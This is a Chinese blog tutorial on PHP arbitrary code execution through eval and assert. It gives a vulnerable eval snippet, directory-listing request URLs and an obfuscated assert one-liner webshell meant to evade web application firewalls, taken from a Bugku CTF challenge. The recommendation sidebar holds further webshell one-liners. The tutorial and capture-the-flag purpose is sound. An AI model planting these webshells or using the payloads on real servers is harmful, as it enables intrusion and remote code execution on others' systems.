php任意代码执行漏洞浅析

最新推荐文章于 2024-08-11 00:26:41 发布
最新推荐文章于 2024-08-11 00:26:41 发布
阅读量6.9k 收藏 5
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40657585/article/details/84285844
版权

漏洞成因

 当应用在调用一些能将字符转化为代码的函数(如PHP中的eval,assert)时,没有考虑用户是否能控制这个字符串,这就会造成代码执行漏洞。

常见函数

php:eval,assert

python:exec

区别

eval与assert区别

eval函数中参数是字符,如:

eval('echo 1;');

assert函数中参数为表达式 (或者为函数),如:

 assert(phpinfo())

漏洞利用

1.eval()函数

定义

eval函数把字符串按照php代码来计算。该字符串必须合法,且必须以分号结尾。如果代码字符串中没有返回语句,则返回NULL,如果代码中解析错误,返回false。

例子

<?php
$a = $_GET['a'];
eval($a);
?>

我们可以通过get方式传入一个字符串,由eval执行,就变成命令

http://127.0.0.1/test/1.php?a=var_dump(scandir('./'))

2.assert

定义

检查一个断言是否为false

例子

bugku的过狗一句话,可以试试

<?php 
$poc="a#s#s#e#r#t"; 
$poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; 
$poc_2($_GET['s']) 
?>

 扫描当前目录

 http://123.206.87.240:8010/?s=var_dump(scandir(%27./%27))

 

Hydra.
关注
-----已搬运-------攻防世界:mfw --------assert() 闭合后的任意代码执行
Zero_Adam的博客
02-19 253
目录:一.学到的知识点:二、我的做题思路三、WP做法: 一.学到的知识点: bool or die() 当 前面的 为真的时候,后面的就不执行了 assert()语法 。的知识点如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码执行。跟eval()类似, 不过eval($assertion)只是执行符合php编码规范的$code_str assert(mixed $assertion, $exception) // 返回值为bool型 assert()会检查 assert
php--fpm任意代码执行复现
Sylon的博客
05-19 1638
0x00:前言: 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 0x01:漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Ng.
z-blog+php+漏洞,bo-blog index.php include任意php文件漏洞
weixin_27034523的博客
03-19 314
来源:[F.S.T]火狐技术联盟文章作者:我非我[F.S.T]漏洞发现日期:2005.6.13漏洞涉及版本:Bo-Blog Version <= 1.7.0108(未打补丁前)漏洞分析及利用:刚发现bo-blog的一个致命的漏洞。我是看1.7.0095版本的。不过估计最新的也有这个漏洞.在index.php中的job变量没有过滤.导致用户可以任意include一个php文件.index.ph...
PHP语言特性漏洞汇总【万字详解】
最新发布
2301_80064376的博客
08-11 1308
PHP 的一些特性,如动态函数调用、弱类型比较和文件包含机制,可能导致安全漏洞。这些特性如果未正确使用或验证,会被恶意用户利用,导致任意代码执行、信息泄露或权限绕过。确保输入验证和安全配置是防范此类漏洞的关键。
漏洞复现篇——任意代码命令执行漏洞复现及防御
爱国小白帽
02-27 4009
什么是代码执行: 当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞代码执行函数: 在php中:eval,assert,preg_replace(‘/*/e’, 'ret="1";′,ret = "\\1";',ret="1";′,data); 在asp中:eval, exevute,executeglobal 在jsp中:jsp中没有p...
web渗透之——任意代码执行漏洞
wsnbbz的博客
03-04 1503
漏洞原理 当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞php中: eval,assert,将字符串当成代码执行 preg_replace("/wslp/e","$xr",“wslp”);用第二个参数的执行结果替换第三个参数里的第一个参数指定的值 漏洞形成 如果被执行的字符串是通过前端参数传过来的攻击代码,或者数据库里被植入攻击代码数据,就...
ssrf漏洞php代码审计1
m0_55772907的博客
04-30 1099
(1)原理 web服务器经常需要从别的服务器获取数据,比如文件载入、图片拉取、图片识别等功能,如果获取数据的服务器地址可控,攻击者就可以通过web服务器自定义向别的服务器发出请求。因为web服务器常搭建在DMZ区域,因此常被攻击者当作跳板,向内网服务器发出请求。 (2)分类 1)curl_exec 发现存在url传递。在这里提交url参数和内容,服务器用函数curl_exec()执行,并将结果输出 在下面页面做测试发现可以正常跳转,所以可以在此去执行一些恶意操作。 2)file_get_co.
SSRF漏洞浅析+ctfhub简单实战
热门推荐
wo41ge的博客
03-27 1万+
花时间 写一下SSRF 凑合看吧 2020/3/24 14.26 漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。 正是因为恶意请求由服务端发起,而服务端能够请求到与自身相连而与外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。 ssrf csrf 重放攻击 换行注入 漏洞成因 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地
Java代码审计漏洞挖掘(入门)
Ms08067安全实验室
11-10 4672
出品|MS08067实验室(www.ms08067.com)双十一最有意义的事情莫过于是学习一门高级渗透技术了!代码审计属于高级渗透测试服务的一环,顾名思义就是检查源代码中的安全缺陷,检查...
浅析文件上传漏洞
L_lemo004的博客
10-20 458
文章目录文件上传成因客户端校验服务器校验原理危害防御解析漏洞 文件上传 成因 对于上传文件的后缀名(扩展名)没有做较为严格的限制 对于上传文件的MIMETYPE 没有做检查 权限上没有控制对于上传的文件的文件权限,(尤其是对于shebang类型的文件) 对于web server对于上传文件或者指定目录的行为没有做限制 客户端校验 前段js验证 可通过审计修改js代码或burp改包绕过 服务器校验 content-type字段校验 将Content-Type修改为image/gif,或者
浅析常见Debug调试器的安全隐患.pdf
09-18
Xdebug是PHP的调试扩展,它提供了丰富的调试功能,但同时也可能成为攻击者获取远程代码执行能力的途径。尽管文章没有详细展开Xdebug的利用细节,但提到了它作为PHP扩展的特点,以及它在协助调试和开发中的作用。 综...
php 5.5.12 server 漏洞,漏洞预警 | ThinkPHP5远程命令执行漏洞
weixin_31597759的博客
04-11 674
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前言ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企 业应用开发而诞生的。由于其简单易用,国内用户众多。2019年1月11日ThinkPHP团队发布了版本更新,本次更新包含了一个可能GetShell的安全更新,具体内容为改...
php eval注入漏洞,CVE-2013-1349 openSIS ajax.php脚本eval注入漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...
weixin_36403587的博客
03-13 239
### This module requires Metasploit: http//metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class Metasploit3 < Msf::Exploit::RemoteRank = ...
php漏洞eval,Web安全之代码执行漏洞
weixin_36440677的博客
03-11 1859
原标题:Web安全之代码执行漏洞内容1、代码执行漏洞的概述2、代码执行漏洞的危害3、代码执行漏洞的利用4、代码执行漏洞的防御 背景介绍在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。例子PHP CMS中 settings的内容:array('upl...
第十一天任意代码执行漏洞
代码审计
03-16 1494
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞代码执行 和 命令执行 代码执行 后端语言执行 php java .net nodejs 命令执行 调用系统接口 面试喜欢问 代码执行常见的函数 代码执行各函数之间的特点 代码执行如何修复 bypass disable fu nctiO
PHP代码函数的执行漏洞
知足且坚定,温柔且上进
04-07 1887
eval函数 eval()函数可以将参数中的变量值执行,通常处于处理模板和动态加载PHP代码,但也常常被攻击者利用,比如一句话后门程序: <?php eval($_GET[cmd])?> assert()函数 assert()函数在PHP中用来判断一个表达式是否成立,返回真或假。如果直接将PHP代码传入也会被执行。 <?php assert($_GET["cmd"]);?&g...
论一句话过WAF
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-07 1907
一.绕过方式 木马存在敏感字符被拦截 木马代码存在敏感字符,直接被waf。如:如直接传&lt;?php @@eval($_POST['123']); ?&gt;,由于存在eval危险函数直接被拦截。 这时候需要对被waf的危险字符进行各种变形即可 收集的过狗马,最大同性交友网站github也有很多webshell项目 $poc = "a#s#s#e#r#t"; $poc_1 = e......
Bugku-CTF-shell-过狗一句话
kaixinXQ的博客
08-08 421
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 点击题目: 读取PHP下面的文件: print_r(scandir($dir)),还可以利用print_r(glob("*.*")) 访问txt文件:http://114.67.246.176:16100/.
assert()代码执行漏洞
qq_33505576的博客
07-01 3263
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> 使用?s=print_r(scandir('./'))进行目录扫描以发现代码的执...
编译原理浅析代码生成与优化
这个阶段通常发生在编译过程的末尾,它将经过优化的中间代码转化为特定机器架构下的可重定位机器代码或汇编代码,以便最终被链接器处理并生成可执行程序。 编译器的工作可以分为多个阶段,这些阶段包括: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值